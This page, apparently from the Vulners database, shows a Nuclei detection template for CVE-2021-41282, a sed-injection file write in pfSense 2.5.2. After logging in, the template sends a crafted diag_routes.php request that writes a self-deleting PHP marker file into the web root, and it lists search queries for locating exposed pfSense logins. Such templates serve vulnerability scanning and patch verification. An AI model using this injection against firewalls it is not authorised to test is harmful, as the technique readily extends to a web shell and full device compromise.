| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| pfSense 2.5.2 Shell Upload Exploit | 4 Mar 202200:00 | – | zdt | |
| CVE-2021-41282 | 1 Mar 202223:15 | – | attackerkb | |
| CVE-2021-41282 | 3 Mar 202221:29 | – | circl | |
| pfSense 注入漏洞 | 14 Feb 202200:00 | – | cnnvd | |
| pfSense Remote Code Execution (CVE-2021-41282) | 12 May 202200:00 | – | checkpoint_advisories | |
| CVE-2021-41282 | 1 Mar 202222:45 | – | cve | |
| CVE-2021-41282 | 1 Mar 202222:45 | – | cvelist | |
| pfSense Diag Routes Web Shell Upload | 4 Mar 202217:43 | – | metasploit | |
| Vulnerability fixed in pfSense | 24 Feb 202200:00 | – | ncsc | |
| Vulnerabilities fixed in pfSense | 15 Mar 202200:00 | – | ncsc |
id: CVE-2021-41282
info:
name: pfSense - Arbitrary File Write
author: cckuailong
severity: high
description: |
diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (e.g., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized modification of critical system files, potentially resulting in a complete compromise of the pfSense firewall.
remediation: |
Upgrade to pfSense CE software version 2.6.0 or later, or pfSense Plus software version 22.01 or later.
reference:
- https://www.shielder.it/advisories/pfsense-remote-command-execution/
- https://www.rapid7.com/db/modules/exploit/unix/http/pfsense_diag_routes_webshell/
- https://docs.netgate.com/downloads/pfSense-SA-22_02.webgui.asc
- https://nvd.nist.gov/vuln/detail/CVE-2021-41282
- https://docs.netgate.com/pfsense/en/latest/releases/22-01_2-6-0.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-41282
cwe-id: CWE-74
epss-score: 0.87113
epss-percentile: 0.99726
cpe: cpe:2.3:a:pfsense:pfsense:2.5.2:*:*:*:*:*:*:*
metadata:
max-request: 4
vendor: pfsense
product: pfsense
shodan-query: http.title:"pfsense - login"
fofa-query: title="pfsense - login"
google-query: intitle:"pfsense - login"
tags: cve2021,cve,pfsense,rce,authenticated,vuln
http:
- raw:
- |
GET /index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=
- |
GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x3c\x3fphp+var_dump(md5(\x27CVE-2021-41282\x27));unlink(__FILE__)\x3b\x3f\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1
Host: {{Hostname}}
- |
GET /test.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "contains(body, 'c3959e8a43f1b39b0d1255961685a238')"
- "status_code==200"
condition: and
extractors:
- type: regex
name: csrf_token
group: 1
regex:
- '(sid:[a-z0-9,;:]+)'
internal: true
part: body
# digest: 490a0046304402207a0dee8c903d3414590eb1f4555f48fe194efd22a66bd7d5c21bb0e2c08866690220642d34651aeb3661c5668d2e12777f06ef1b22b46e4c6d0c6c0288ebcb02206c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation